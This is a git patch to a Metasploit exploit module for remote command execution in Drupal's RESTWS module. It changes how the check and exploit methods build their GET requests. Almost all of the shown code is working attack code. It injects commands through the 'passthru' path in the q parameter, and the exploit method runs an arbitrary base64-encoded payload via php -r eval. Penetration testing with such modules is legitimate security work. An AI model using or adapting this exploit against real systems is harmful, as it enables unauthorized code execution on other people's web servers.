From 9c8e351ba89ca8717df6dfd57f2ced86d899a74c Mon Sep 17 00:00:00 2001
From: Mehmet Ince <mehmet@mehmetince.net>
Date: Tue, 19 Jul 2016 20:12:14 +0300
Subject: [PATCH] Use vars_get un send_request_cgi

---
 .../exploits/unix/webapp/drupal_restws_exec.rb | 18 +++++++++---------
 1 file changed, 9 insertions(+), 9 deletions(-)

diff --git a/modules/exploits/unix/webapp/drupal_restws_exec.rb b/modules/exploits/unix/webapp/drupal_restws_exec.rb
index 51a8e2d3f6..546d2d0c73 100644
--- a/modules/exploits/unix/webapp/drupal_restws_exec.rb
+++ b/modules/exploits/unix/webapp/drupal_restws_exec.rb
@@ -53,10 +53,12 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def check
     r = rand_text_alpha(8 + rand(4))
-    url = normalize_uri(target_uri.path, "?q=taxonomy_vocabulary/", r , "/passthru/echo%20#{r}")
     res = send_request_cgi(
       'method' => 'GET',
-      'uri' => url
+      'uri' => normalize_uri(target_uri.path, "index.php"),
+      'vars_get' => {
+          'q' => "taxonomy_vocabulary/#{r}/passthru/echo #{r}"
+      }
     )
     if res && res.body =~ /#{r}/
       return Exploit::CheckCode::Appears
@@ -66,15 +68,13 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def exploit
     random = rand_text_alpha(1 + rand(2))
-    url = normalize_uri(target_uri.path,
-      "?q=taxonomy_vocabulary/",
-      random ,
-      "/passthru/",
-      Rex::Text.uri_encode("php -r 'eval(base64_decode(\"#{Rex::Text.encode_base64(payload.encoded)}\"));'")
-    )
+    cmd = "php -r 'eval(base64_decode(\"#{Rex::Text.encode_base64(payload.encoded)}\"));'"
     send_request_cgi(
       'method' => 'GET',
-      'uri' => url
+      'uri' => normalize_uri(target_uri.path, "index.php"),
+      'vars_get' => {
+          'q' => "taxonomy_vocabulary/#{random}/passthru/#{cmd}"
+      }
     )
   end
 end